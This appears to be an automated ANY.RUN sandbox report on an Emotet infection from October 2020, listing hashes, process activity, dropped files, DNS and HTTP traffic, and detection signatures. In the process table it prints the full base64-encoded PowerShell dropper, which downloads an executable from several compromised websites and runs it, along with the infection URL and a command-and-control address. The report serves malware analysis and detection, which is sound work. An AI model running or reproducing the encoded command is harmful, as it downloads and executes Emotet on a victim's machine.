analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://cozyvietnamtravel.com/test/Documentation/XZO0mTAjjTQI98VxvmbD/

Full analysis: https://app.any.run/tasks/97d025dd-714f-4796-aec1-d834c91861dc
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 19, 2020, 22:20:34
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
emotet
emotet-doc
Indicators:
MD5:

1694741B48CFC334BA589EB2BB3A9B7B

SHA1:

D3102442D7DF2344785329446B6A2BCB0A39F7D1

SHA256:

1A2314849276215DB66D08E652EBD0BC3BE01500716631467530BF9C6A0BC53F

SSDEEP:

3:N1KdKfYeTKANhdQ/BfofOEHhK:CIlTbNuof5c

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • wevtsvc.exe (PID: 980)
      • Row8yn.exe (PID: 2508)
    • Changes the autorun value in the registry

      • wevtsvc.exe (PID: 980)
    • Connects to CnC server

      • wevtsvc.exe (PID: 980)
    • EMOTET was detected

      • wevtsvc.exe (PID: 980)
  • SUSPICIOUS

    • Application launched itself

      • WINWORD.EXE (PID: 3980)
    • Starts Microsoft Office Application

      • iexplore.exe (PID: 1788)
      • WINWORD.EXE (PID: 3980)
    • Executed via WMI

      • POwersheLL.exe (PID: 2188)
      • Row8yn.exe (PID: 2508)
    • PowerShell script executed

      • POwersheLL.exe (PID: 2188)
    • Creates files in the user directory

      • POwersheLL.exe (PID: 2188)
    • Starts itself from another location

      • Row8yn.exe (PID: 2508)
    • Reads Internet Cache Settings

      • wevtsvc.exe (PID: 980)
    • Executable content was dropped or overwritten

      • Row8yn.exe (PID: 2508)
  • INFO

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 1788)
      • iexplore.exe (PID: 1328)
    • Application launched itself

      • iexplore.exe (PID: 1788)
    • Changes internet zones settings

      • iexplore.exe (PID: 1788)
    • Modifies the phishing filter of IE

      • iexplore.exe (PID: 1788)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3980)
      • iexplore.exe (PID: 1788)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1452)
      • WINWORD.EXE (PID: 3980)
    • Reads settings of System Certificates

      • iexplore.exe (PID: 1788)
      • POwersheLL.exe (PID: 2188)
    • Changes settings of System certificates

      • iexplore.exe (PID: 1788)
    • Adds / modifies Windows certificates

      • iexplore.exe (PID: 1788)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
46
Monitored processes
7
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start iexplore.exe iexplore.exe winword.exe no specs winword.exe no specs powershell.exe row8yn.exe #EMOTET wevtsvc.exe

Process information

PID
CMD
Path
Indicators
Parent process
1788"C:\Program Files\Internet Explorer\iexplore.exe" "http://cozyvietnamtravel.com/test/Documentation/XZO0mTAjjTQI98VxvmbD/"C:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
1328"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1788 CREDAT:267521 /prefetch:2C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
3980"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Dat 2020_10_20 627.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1452"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2188POwersheLL -ENCOD IAAgAHMAZQBUAC0AaQB0AGUATQAgACAAdgBhAFIASQBhAEIAbABlADoAOABMAGkAIAAgACgAIABbAHQAWQBwAEUAXQAoACcAUwB5ACcAKwAnAFMAVAAnACsAJwBFACcAKwAnAE0AJwArACcALgBpAE8ALgBEAEkAJwArACcAUgBFAEMAdABvAFIAWQAnACkAIAAgACkAIAA7ACAAIAAgACAAcwBFAHQALQBpAHQARQBNACAAKAAiAFYAYQBSACIAKwAiAGkAIgArACIAQQAiACsAIgBCAGwAZQA6ADIAaABGAEwAIgArACIAcAAiACkAIAAoAFsAVABZAHAAZQBdACgAJwBzAFkAUwB0ACcAKwAnAGUAbQAuACcAKwAnAE4AZQBUAC4AUwBlAHIAVgAnACsAJwBpAGMAZQBQAG8AaQAnACsAJwBuAFQAJwArACcAbQBhAG4AQQBHAEUAcgAnACkAKQAgACAAOwAgAFMAdgAgACgAJwBrACcAKwAnAFIANwAnACkAIAAgACgAIABbAHQAWQBwAGUAXQAoACcAcwB5ACcAKwAnAHMAVAAnACsAJwBFAG0ALgBuAEUAdAAuAFMAZQBDAHUAcgBJACcAKwAnAHQAeQBQAFIAJwArACcAbwAnACsAJwBUAG8AYwBvAGwAJwArACcAVAAnACsAJwB5AHAARQAnACkAKQAgADsAJABOADYAMgBzAGkAbgB6AD0AKAAnAFgAJwArACcAbABuAHMAMABlAHkAJwApADsAJABZADIAYwBtAHEAZABrAD0AJABEADgANwAwADYAOQBjACAAKwAgAFsAYwBoAGEAcgBdACgAOAAwACAALQAgADMAOAApACAAKwAgACQAQQBnAGQAZQA0ADAAdwA7ACQAVwAxADQAdwBtADMAZgA9ACgAJwBLAHgAawBkAGgAXwAnACsAJwBzACcAKQA7ACAAIAAoAFYAYQBSAGkAYQBiAEwARQAgACAAOABsAGkAKQAuAFYAYQBsAFUAZQA6ADoAYwByAEUAYQBUAGUAZABpAFIAZQBjAHQATwBSAFkAKAAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACAAKwAgACgAKAAnAFcAWQBUAEQAZAAnACsAJwAwAGcAcAB2AHMAVwBZACcAKwAnAFQAVQBnAHUAbwBmAGIANwBXAFkAJwArACcAVAAnACkALgBSAGUAcABsAGEAQwBFACgAKABbAGMAaABhAHIAXQA4ADcAKwBbAGMAaABhAHIAXQA4ADkAKwBbAGMAaABhAHIAXQA4ADQAKQAsAFsAcwB0AHIAaQBuAGcAXQBbAGMAaABhAHIAXQA5ADIAKQApACkAOwAkAE4AOABrAGoAZgA5AHMAPQAoACcAVQA3AHMAYgBrACcAKwAnAHYAcwAnACkAOwAgACAAKABHAGUAdAAtAFYAQQBSAEkAYQBiAGwARQAgACAAKAAiADIAIgArACIASABmAEwAUAAiACkAIAAgAC0AdgBhAGwAdQBlAG8AbgBsAFkAIAApADoAOgBTAGUAQwBVAFIAaQB0AFkAcAByAG8AVABPAEMATwBMACAAPQAgACAAKABDAGgAaQBsAEQASQBUAGUATQAgACAAKAAiAHYAQQBSACIAKwAiAEkAYQBiACIAKwAiAGwAZQA6AEsAUgA3ACIAKQAgACkALgBWAGEATABVAGUAOgA6AHQAbABzADEAMgA7ACQAUwBxAHkAagBsAGMAawA9ACgAJwBUAGQAdQBoACcAKwAnAHgAXwAnACsAJwB4ACcAKQA7ACQATABzAHgANwBrAG0AbQAgAD0AIAAoACcAUgBvAHcAJwArACcAOAB5ACcAKwAnAG4AJwApADsAJABZAGgAaAA1AHEAawBkAD0AKAAnAFUAZQBtACcAKwAnAG4AMwBtAGkAJwApADsAJABMAHcAOQBzAGIAbgBsAD0AKAAnAFUAJwArACcAagByAG4AOABfACcAKwAnAHcAJwApADsAJABTAHAAawBiAGIANABkAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAGgARwB0AEQAZAAnACsAJwAwACcAKwAnAGcAcAB2AHMAJwArACcAaAAnACsAJwBHAHQAVQAnACsAJwBnAHUAbwBmACcAKwAnAGIANwBoAEcAdAAnACkALgByAGUAUABsAEEAQwBlACgAKABbAEMAaABBAHIAXQAxADAANAArAFsAQwBoAEEAcgBdADcAMQArAFsAQwBoAEEAcgBdADEAMQA2ACkALAAnAFwAJwApACkAKwAkAEwAcwB4ADcAawBtAG0AKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwAkAEoAeQAxAGIAZABpADYAPQAoACcAUQAnACsAJwB3ACcAKwAnADIAYwBsAHcANwAnACkAOwAkAE0AagBqAGoANABwAGMAPQBuAGAARQBgAFcALQBvAGIASgBFAEMAVAAgAE4ARQB0AC4AdwBFAEIAYwBsAEkARQBuAFQAOwAkAEUAeABtAGcAXwA3AGoAPQAoACcAaAB0ACcAKwAnAHQAcABzADoALwAvAHkAaQAnACsAJwB4ACcAKwAnAHUAZQBjAG8AJwArACcAdQByAHMAZQAuAGMAJwArACcAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzACcAKwAnAC8AdwAnACsAJwBFAC8AKgBoAHQAJwArACcAdAAnACsAJwBwAHMAOgAvACcAKwAnAC8AZQBzAHQAJwArACcAeQBsAG8AaABvACcAKwAnAHUAcwBlAC4AYwBvACcAKwAnAG0ALwBwAG0AJwArACcAcwAvAGEAJwArACcAcABwAGwAJwArACcAaQAnACsAJwBjAGEAdABpACcAKwAnAG8AJwArACcAbgAvAGwAYQBuAGcAdQBhAGcAZQAvAGUAJwArACcALwAnACsAJwAqACcAKwAnAGgAdAB0AHAAOgAvAC8AJwArACcANwA3AHcAaQBuAHMAJwArACcALgBjACcAKwAnAGwAdQAnACsAJwBiAC8AdwBwAC0AYwAnACsAJwBvAG4AdABlACcAKwAnAG4AdAAnACsAJwAvADQAJwArACcAeQAvACoAaAB0AHQAcABzADoALwAvAGwAYQB5AGEAZwByACcAKwAnAG8AdQBwAC4AbgBlACcAKwAnAHQALwB3AHAALQBhAGQAbQAnACsAJwBpACcAKwAnAG4AJwArACcALwA1AGgALwAqACcAKwAnAGgAJwArACcAdAB0AHAAcwA6AC8ALwAnACsAJwB6ACcAKwAnAGkAbwBuAGkAbQAnACsAJwBtAGkAJwArACcAZwByAGEAdAAnACsAJwBpAG8AbgAuAGMAbwBtAC8AcwBjAHMAcwAnACsAJwAvAGIASAAnACsAJwBkAC8AKgAnACsAJwBoAHQAJwArACcAdABwAHMAOgAvAC8AdgBpACcAKwAnAHYAbwAnACsAJwBzACcAKwAnAGwAbwB0ACcAKwAnAHAAdQAnACsAJwBsAHMAYQAnACsAJwAuAGMAbwAnACsAJwBtAC8AdwAnACsAJwBwAC0AYwBvAG4AdABlAG4AdAAnACsAJwAvACcAKwAnADEALwAnACsAJwAqAGgAdAB0AHAAcwA6AC8ALwAnACsAJwB3AGkAegB6AGQAbwBtAGgAdQBiAC4AYwBvAG0AJwArACcALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AJwArACcASQBaACcAKwAnAC8AJwApAC4AUwBQAGwASQB0ACgAJABMAGEAZgBrADIANgAzACAAKwAgACQAWQAyAGMAbQBxAGQAawAgACsAIAAkAFgAagBhAGgANAAxAHcAKQA7ACQATgBiAGEAZQB3AGcAawA9ACgAJwBVACcAKwAnADYANgBwAHcAaQAnACsAJwB4ACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUQBpAGMAbABqAGIAcQAgAGkAbgAgACQARQB4AG0AZwBfADcAagApAHsAdAByAHkAewAkAE0AagBqAGoANABwAGMALgBEAG8AdwBOAGwATwBBAEQARgBpAGwAZQAoACQAUQBpAGMAbABqAGIAcQAsACAAJABTAHAAawBiAGIANABkACkAOwAkAEoANAA4ADcANQBtAHQAPQAoACcAWAAnACsAJwBnAGYAJwArACcANgBpAHgAawAnACkAOwBJAGYAIAAoACgARwBgAEUAVAAtAEkAVABFAG0AIAAkAFMAcABrAGIAYgA0AGQAKQAuAEwARQBOAEcAVABoACAALQBnAGUAIAAzADgANQA5ADAAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACgAJwB3AGkAbgAzADIAJwArACcAXwAnACsAJwBQAHIAbwBjAGUAcwBzACcAKQApAC4AYwBSAGUAYQBUAGUAKAAkAFMAcABrAGIAYgA0AGQAKQA7ACQAWQB1AGsAdgAzAGQAagA9ACgAJwBZAHMANwBfACcAKwAnAG0AOQB5ACcAKQA7AGIAcgBlAGEAawA7ACQAVgA1AGEANQAxAF8AZwA9ACgAJwBOACcAKwAnAGgAcABiAHEAXwBlACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWQBwAHoAegBuAHcAdgA9ACgAJwBSAGcAJwArACcAOAA1ACcAKwAnAHgAdAB1ACcAKQA= C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2508C:\Users\admin\Dd0gpvs\Uguofb7\Row8yn.exeC:\Users\admin\Dd0gpvs\Uguofb7\Row8yn.exe
wmiprvse.exe
User:
admin
Integrity Level:
MEDIUM
Description:
MFC-Anwendung Formula
Exit code:
0
Version:
1, 0, 0, 4
980"C:\Users\admin\AppData\Local\sppcext\wevtsvc.exe"C:\Users\admin\AppData\Local\sppcext\wevtsvc.exe
Row8yn.exe
User:
admin
Integrity Level:
MEDIUM
Description:
MFC-Anwendung Formula
Version:
1, 0, 0, 4
Total events
3 602
Read events
2 540
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
12
Text files
5
Unknown types
6

Dropped files

PID
Process
Filename
Type
1328iexplore.exeC:\Users\admin\Desktop\Dat 2020_10_20 627.doc.r73sbw3.partial
MD5:
SHA256:
1788iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFE786659AE10937D7.TMP
MD5:
SHA256:
1788iexplore.exeC:\Users\admin\Desktop\Dat 2020_10_20 627.doc.r73sbw3.partial:Zone.Identifier
MD5:
SHA256:
3980WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9A73.tmp.cvr
MD5:
SHA256:
3980WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_D8882C32-F726-40C2-93E4-F29DB8D776E4.0\1B1D7AAD.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
1452WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_D8882C32-F726-40C2-93E4-F29DB8D776E4.0\~DFFC4BD5770DFBE311.TMP
MD5:
SHA256:
2188POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\37BXYUEMEQTIZ0ZSHL51.temp
MD5:
SHA256:
1788iexplore.exeC:\Users\admin\AppData\Local\Temp\CabCC80.tmp
MD5:
SHA256:
1788iexplore.exeC:\Users\admin\AppData\Local\Temp\TarCC81.tmp
MD5:
SHA256:
2188POwersheLL.exeC:\Users\admin\Dd0gpvs\Uguofb7\Row8yn.exe
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
12
DNS requests
10
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1788
iexplore.exe
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D
US
der
1.47 Kb
whitelisted
1328
iexplore.exe
GET
200
103.101.162.9:80
http://cozyvietnamtravel.com/test/Documentation/XZO0mTAjjTQI98VxvmbD/
unknown
document
155 Kb
unknown
980
wevtsvc.exe
POST
200
186.189.249.2:80
http://186.189.249.2/oGZXoKki9BzyNSBEcXZ/Tgi1tQNB3vyEKbh1MH/HJMuiZObi14oOed/0BnXb7GsLkDvuAO/
AR
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1788
iexplore.exe
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
1788
iexplore.exe
152.199.19.161:443
iecvlist.microsoft.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
152.199.19.161:443
iecvlist.microsoft.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
1328
iexplore.exe
103.101.162.9:80
cozyvietnamtravel.com
unknown
2188
POwersheLL.exe
132.232.249.32:443
yixuecourse.com
LeaseWeb Netherlands B.V.
NL
unknown
980
wevtsvc.exe
186.189.249.2:80
AR
malicious
1788
iexplore.exe
204.79.197.200:443
www.bing.com
Microsoft Corporation
US
whitelisted

DNS requests

Domain
IP
Reputation
cozyvietnamtravel.com
  • 103.101.162.9
unknown
api.bing.com
  • 13.107.5.80
whitelisted
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
yixuecourse.com
  • 132.232.249.32
unknown
iecvlist.microsoft.com
  • 152.199.19.161
whitelisted
r20swj13mr.microsoft.com
  • 152.199.19.161
whitelisted
ocsp.digicert.com
  • 93.184.220.29
whitelisted
ieonline.microsoft.com
  • 204.79.197.200
whitelisted

Threats

PID
Process
Class
Message
1328
iexplore.exe
Misc activity
SUSPICIOUS [PTsecurity] Download DOC file with VBAScript
980
wevtsvc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Emotet
1 ETPRO signatures available at the full report
No debug info